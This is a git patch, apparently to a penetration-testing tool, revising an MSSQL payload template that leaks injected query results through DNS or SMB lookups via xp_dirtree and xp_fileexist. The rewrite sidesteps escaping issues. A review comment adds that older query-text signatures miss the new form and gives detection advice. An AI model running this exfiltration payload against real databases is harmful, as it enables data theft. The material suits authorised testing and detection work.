From 4d259790cd0d3ccb3991fc99f7fb01ecffbf93e6 Mon Sep 17 00:00:00 2001
From: Jason Juntunen <29318503+missing0x00@users.noreply.github.com>
Date: Thu, 23 Jan 2025 21:14:45 -0600
Subject: [PATCH] Change MSSQL dns_request.sql to reduce escaping issues

Modified the xp_dirtree and xp_cmdshell UNC paths to use forward slashes instead of backslashes, and removed the space between the procedure name and quoted path. These changes help to avoid escaping/encoding issues, for example when using JSON. MSSQL still handles it the same way and will cause a DNS query or SMB authentication attempt.
---
 data/procs/mssqlserver/dns_request.sql | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/data/procs/mssqlserver/dns_request.sql b/data/procs/mssqlserver/dns_request.sql
index a269c7e16..782d39608 100644
--- a/data/procs/mssqlserver/dns_request.sql
+++ b/data/procs/mssqlserver/dns_request.sql
@@ -1,4 +1,4 @@
 DECLARE @host varchar(1024);
 SELECT @host='%PREFIX%.'+(%QUERY%)+'.%SUFFIX%.%DOMAIN%';
-EXEC('master..xp_dirtree "\\'+@host+'\%RANDSTR1%"')
-# or EXEC('master..xp_fileexist "\\'+@host+'\%RANDSTR1%"')
+EXEC('master..xp_dirtree"//'+@host+'/%RANDSTR1%"')
+# or EXEC('master..xp_fileexist"//'+@host+'/%RANDSTR1%"')
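Review bot: The two rewritten `EXEC` lines carry no comment saying that the missing space after `xp_dirtree`/`xp_fileexist` and the forward-slash path are deliberate, so a later cleanup is likely to "correct" them back to the old form. I would add a line such as `# forward slashes and no space before the quoted path are intentional: fewer characters that need escaping (e.g. in JSON)` above the first `EXEC`, assuming the loader drops `#` lines as the existing `# or` line suggests. The compact form also relies on the server accepting a quoted string directly after the procedure name and treating `//host/` as a UNC path; the commit text says it does, but the SQL Server versions it was checked against are not recorded and would be worth naming in that comment. For defenders, query-text signatures written against the `xp_dirtree "\\` form will not match this variant, so detection is better keyed on the procedure name itself together with outbound DNS/SMB from the database host.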